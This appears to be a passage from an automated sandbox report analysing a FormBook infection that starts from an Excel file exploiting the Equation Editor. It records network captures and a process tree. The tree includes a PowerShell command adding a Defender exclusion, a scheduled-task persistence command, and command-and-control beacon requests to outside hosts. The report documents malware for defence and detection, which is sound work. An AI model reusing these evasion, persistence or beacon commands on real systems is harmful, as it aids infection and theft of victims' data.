72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 66 69 6e 64 71 75 69 63 6b 72 65 73 75 6c 74 73 6e 6f 77 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 66 69 6e 64 71 75 69 63 6b 72 65 73 75 6c 74 73 6e 6f 77 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 66 69 6e 64 71 75 69 63 6b 72 65 73 75 6c 74 73 6e 6f 77 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 4f 48 59 77 53 48 42 36 65 6c 41 78 61 30 70 5a 52 48 4a 52 62 55 56 61 62 47 52 6b 65 6a 42 75 52 53 74 35 64 6a 68 4f 4f 56 63 31 61 6e 59 76 56 7a 5a 42 5a 54 52 6b 4f 48 64 51 61 33 42 33 57 45 52 79 62 6d 77 76 59 6c 5a 54 4f 44 68 6b 55 56 5a 77 62 6b 31 52 4b 7a 56 31 4e 6d 77 35 64 6b 68 31 61 55 78 54 61 56 4e 32 52 32 35 51 63 6b 49 31 4f 46 4a 53 4d 31 4a 54 54 58 52 4e 65 45 4a 48 56 6b 46 77 54 33 70 31 64 6e 4e 4a 4f 57 39 6c 64 6a 4a 72 54 7a 4e 44 51 31 42 68 52 44 56 6a 5a 31 4e 30 54 55 67 3d 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b 69 66 28 74 79 70 65 6f 66 20 61 62 70 65 72 75 72 6c 20 21 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 26 26 20 61 62 70 65 72 75 72 6c 21 3d 22 22 29 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 61 62 70 65 72 75 72 6c 3b 7d 63 61 74 63 68 28 65 72 72 29 7b 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 3d 27 31 33 30 31 37 27 20 62 3d 27 31 35 30 34 35 27 20 63 3d 27 66 72 61 6e 71 75 69 63 69 61 73 65 78 63 6c 75 73 69 76 61 73 2e 74 69 65 6e 64 61 27 20 64 3d 27 65 6e 74 69 74 79 5f 6d 61 70 70 65 64 27 22 20 2f 3e 3c 74 69 74 6c 65 3e 46 72 61 6e 71 75 69 63 69 61 73 65 78 63 6c 75 73 69 76 61 73 2e 74 69 65 6e 64 61 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d Data Ascii: 3e56<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://findquickresultsnow.com/px.js?ch=1"></script><script type="text/javascript" src="http://findquickresultsnow.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://findquickresultsnow.com/sk-logabpstatus.php?a=OHYwSHB6elAxa0pZRHJRbUVabGRkejBuRSt5djhOOVc1anYvVzZBZTRkOHdQa3B3WERybmwvYlZTODhkUVZwbk1RKzV1Nmw5dkh1aUxTaVN2R25QckI1OFJSM1JTTXRNeEJHVkFwT3p1dnNJOW9ldjJrTzNDQ1BhRDVjZ1N0TUg=&b="+abp;document.body.appendChild(imglog);if(typeof abperurl !== "undefined" && abperurl!="")window.top.location=abperurl;}catch(err){}}</script><meta name="tids" content="a='13017' b='15045' c='franquiciasexclusivas.tienda' d='entity_mapped'" /><title>Franquiciasexclusivas.tienda</title><meta http-
Nov 25, 2021 19:27:42.952533960 CET	478	IN	Data Raw: 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f Data Ascii: equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><style type="text/css">@font-face {font-family: "ubuntu-r";src: url("http://i3.cdn-image.com/__m
Nov 25, 2021 19:27:42.952574015 CET	479	IN	Data Raw: 74 72 75 65 74 79 70 65 22 29 2c 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 33 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 75 62 75 6e 74 75 2d 62 2f 75 62 75 6e 74 75 2d 62 2e 6f 74 66 22 29 20 66 6f Data Ascii: truetype"),url("http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf") format("opentype"),url("http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b") format("svg");font-weight: normal;font-style: normal;}*{ma
Nov 25, 2021 19:27:42.952613115 CET	480	IN	Data Raw: 6c 61 74 65 64 2d 73 65 61 72 63 68 65 73 20 75 6c 2e 6c 61 73 74 7b 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 7d 0d 0a 23 6c 61 73 74 55 4c 7b 6d 61 72 67 69 6e 3a 20 30 7d 0d 0a 2e 70 6f 70 75 6c 61 72 2d 73 65 61 72 63 68 65 73 20 75 6c Data Ascii: lated-searches ul.last{ border-bottom:0}#lastUL{margin: 0}.popular-searches ul.first li{ margin-bottom: 10px;-webkit-text-size-adjust: 100%;color: #ffffff;text-align: left;word-wrap: break-word; background:#232a33 url(http://i3.cdn-image.
Nov 25, 2021 19:27:42.952650070 CET	482	IN	Data Raw: 70 78 3b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 7d 0d 0a 2e 77 65 62 73 69 74 65 20 69 6d 67 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 32 70 78 7d 0d 0a 2e 6c 6f 67 6f 7b 66 6c 6f 61 74 3a 20 72 Data Ascii: px;display: block;}.website img{float: left;padding-right: 12px}.logo{float: right;padding-top: 12px}.header{margin: 0px 0 0px 0;background-color: #161d27;padding: 20px 0;}.footer {text-align:center; color:#ccc; width:100%; padding:4
Nov 25, 2021 19:27:42.952688932 CET	483	IN	Data Raw: 78 3b 20 6f 75 74 6c 69 6e 65 3a 20 6d 65 64 69 75 6d 20 6e 6f 6e 65 3b 20 77 69 64 74 68 3a 20 33 38 70 78 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 Data Ascii: x; outline: medium none; width: 38px;-webkit-appearance:none;-webkit-border-radius:0;-moz-border-radius:0;border-radius:0;text-transform: uppercase;}.custom-msg { text-align: center;background-color: #fff;}div#optOutLink{ paddin
Nov 25, 2021 19:27:42.952728033 CET	485	IN	Data Raw: 74 3a 20 31 35 70 78 7d 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 36 70 78 29 20 7b 0d 0a 20 20 20 20 23 6d 61 69 6e 7b 77 69 64 74 68 3a 20 39 30 25 21 69 6d Data Ascii: t: 15px}}@media only screen and (max-width:776px) { #main{width: 90%!important;margin: 0px auto;padding-bottom: 0px;} .website{width: 45%;} .website .domain{font-size: 22px;padding-top: 18px} /*.popular-searches ul{ w
Nov 25, 2021 19:27:42.952764988 CET	486	IN	Data Raw: 79 6e 61 6d 69 63 2d 63 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 0d 0a 0d 0a 0d 0a 23 74 72 61 64 65 6d 61 72 6b 2d 66 6f 6f 74 65 72 20 7b 70 61 64 64 69 6e 67 3a 20 31 35 70 78 20 30 3b 20 74 65 78 Data Ascii: ynamic-content{padding: 0 !important}#trademark-footer {padding: 15px 0; text-align: center; font-size: 12px; background-color:#232a33;margin-bottom: 20px}/.footerwrap {width: 960px; margin: 0px auto; }//*.foottxt {width: 580px; ma
Nov 25, 2021 19:27:42.952804089 CET	487	IN	Data Raw: 6e 61 6d 65 3d 22 66 72 6d 53 70 6f 6e 73 41 64 73 22 20 69 64 3d 22 66 72 6d 53 70 6f 6e 73 41 64 73 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 61 63 74 69 6f 6e 3d 22 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6e 70 75 74 20 74 79 Data Ascii: name="frmSponsAds" id="frmSponsAds" method="get" action="" target="_top"><input type="hidden" name="params" id="params" /></form></div> <div class="clearfix header"> <div class="main-container"> <div class="websit
Nov 25, 2021 19:27:42.952841997 CET	489	IN	Data Raw: 56 42 50 5a 32 30 7a 59 58 56 76 64 6d 46 4b 57 47 4e 32 54 48 6c 43 55 55 78 59 63 56 56 4e 55 47 30 7a 55 43 39 50 4f 44 64 76 5a 6e 67 34 4d 55 74 68 56 57 78 77 59 32 31 70 5a 6c 70 35 62 32 74 4b 4e 6a 68 36 65 6a 56 77 54 54 64 5a 55 6c 56 Data Ascii: VBPZ20zYXVvdmFKWGN2THlCUUxYcVVNUG0zUC9PODdvZng4MUthVWxwY21pZlp5b2tKNjh6ejVwTTdZUlVya1JXcU1yMTVHcGUyZ1Q2WTlMVWJYVUZZQ0NsUVlqNEptZG8va2kwYTVPVzdIZUo3OWlsZz0%3D" /></form> </div> </div> </div>
Nov 25, 2021 19:27:43.092233896 CET	490	IN	Data Raw: 61 73 65 78 63 6c 75 73 69 76 61 73 2e 74 69 65 6e 64 61 26 66 70 3d 78 57 78 53 49 68 6c 61 61 33 54 33 36 43 33 30 51 75 79 6c 52 6a 25 32 46 55 48 6d 64 32 34 75 5a 39 41 38 25 32 42 6e 62 30 37 55 6d 5a 6a 39 71 48 4f 37 48 32 4e 4a 74 45 25 Data Ascii: asexclusivas.tienda&fp=xWxSIhlaa3T36C30QuylRj%2FUHmd24uZ9A8%2Bnb07UmZj9qHO7H2NJtE%2BJ0rI2LQKoYkyzQjGvvVkcw8Fz7F5rGjA6cV%2BcRE0fSEioCxEQ8hsk%2B7MgcWqePdATAEY3hVeUhYa1lJE6CgNHjb71jKad5s%2BY9L3YEAwbtOxDZinXa1TKujOkQ2teNtPFAx%2BeDt%2Fzu45EAXZFBf%2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49172	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 19:27:53.284538031 CET	499	OUT	GET /ht08/?br2=NsDQ5dhzDoz6b+QTI369eNhdKzsm5WWXC1g1e1LkMaMU2QVIAgjIadv0XRSqFt55bwDZkw==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1 Host: www.hacticum.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 19:27:53.403893948 CET	500	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 25 Nov 2021 18:27:53 GMT Content-Type: text/html Content-Length: 275 ETag: "6192576d-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49173	151.101.66.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 19:27:58.549930096 CET	501	OUT	GET /ht08/?br2=uW1sPHtBOFcvSjOqiE7uYKY6CRw967TpF9DAp4EO6MgnVSdl1zAyFQ+ogdnPtirgP8DfTg==&fDKD5Z=lbLdxBhXWNSHTR HTTP/1.1 Host: www.trashwasher.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 25, 2021 19:27:58.566992998 CET	502	IN	HTTP/1.1 401 Restricted Server: Varnish Retry-After: 0 Content-Type: text/html; charset=utf-8 WWW-Authenticate: Basic realm="Please enter your username and password.", charset="UTF-8" Content-Length: 2162 Accept-Ranges: bytes Date: Thu, 25 Nov 2021 18:27:58 GMT Connection: close X-Served-By: cache-mxp6975-MXP X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1637864879.559029,VS0,VE2 X-FW-Serve: TRUE X-FW-Static: NO X-FW-Type: FLYWHEEL_BOT Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 20 3d 20 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 09 09 09 68 74 6d 6c 20 7b 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 20 7d 0a 09 09 09 62 6f 64 79 20 7b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4c 61 74 6f 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 20 33 32 30 70 78 3b 20 7d 0a 09 09 09 2e 6c 61 79 6f 75 74 20 7b 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 34 30 30 70 78 3b 20 7d 0a 09 09 09 2e 6c 61 79 6f 75 74 5f 5f 63 6f 6e 74 65 6e 74 20 7b 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 20 66 6c 65 78 3a 20 31 32 3b 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 32 2e 35 76 68 3b 20 7d 0a 09 09 09 2e 6b 69 74 63 68 65 6e 73 69 6e 6b 20 7b 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 35 30 70 78 3b 20 77 69 64 74 68 3a 20 39 30 25 3b 20 7d 0a 09 09 09 64 69 76 20 7b 20 77 69 64 74 68 3a 20 36 30 30 70 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>Forbidden</title><meta name="viewport" content="width=device-width, initial-scale = 1.0; maximum-scale=1.0, user-scalable=no" /><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><link href="//fonts.googleapis.com/css?family=Lato:400,700" rel="stylesheet" type="text/css"><style type='text/css'>html { -moz-osx-font-smoothing: grayscale; -webkit-font-smoothing: antialiased; }body { margin: 0; font-family: "Lato", Helvetica, Arial, sans-serif; min-width: 320px; }.layout { display: flex; width: 100%; height: 100vh; min-height: 400px; }.layout__content { display: flex; flex: 12; justify-content: center; align-items: center; padding-bottom: 12.5vh; }.kitchensink { max-width: 850px; width: 90%; }div { width: 600p
Nov 25, 2021 19:27:58.567030907 CET	503	IN	Data Raw: 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 63 6f 6c 6f 72 3a 20 23 32 36 32 37 32 37 3b 20 7d 0a 09 09 09 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 32 70 78 3b 20 Data Ascii: x; margin: 0 auto; text-align: center; color: #262727; }h1 { font-size: 42px; font-weight: 900; letter-spacing: 0.02em; margin-top: 0; margin-bottom: 12px; }@media (max-width: 500px) {h1 { font-size: 32px; font-weight: 900; lette

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1212 Parent PID: 596

General

Start time:	19:26:13
Start date:	25/11/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f800000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2828 Parent PID: 596

General

Start time:	19:26:36
Start date:	25/11/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2224 Parent PID: 2828

General

Start time:	19:26:38
Start date:	25/11/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\vbc.exe"
Imagebase:	0xbb0000
File size:	444416 bytes
MD5 hash:	6926A53FA91CAB577D52942A39E5FB53
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.463350952.000000000223F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.463429228.00000000022CD000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 2776 Parent PID: 2224

General

Start time:	19:26:41
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe
Imagebase:	0x21c80000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 2916 Parent PID: 2224

General

Start time:	19:26:41
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp
Imagebase:	0xc60000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 3008 Parent PID: 2224

General

Start time:	19:26:43
Start date:	25/11/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0xbb0000
File size:	444416 bytes
MD5 hash:	6926A53FA91CAB577D52942A39E5FB53
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 1764 Parent PID: 3008

General

Start time:	19:26:45
Start date:	25/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xffa10000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: autofmt.exe PID: 1964 Parent PID: 1764

General

Start time:	19:26:57
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\autofmt.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autofmt.exe
Imagebase:	0xc90000
File size:	658944 bytes
MD5 hash:	A475B7BB0CCCFD848AA26075E81D7888
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

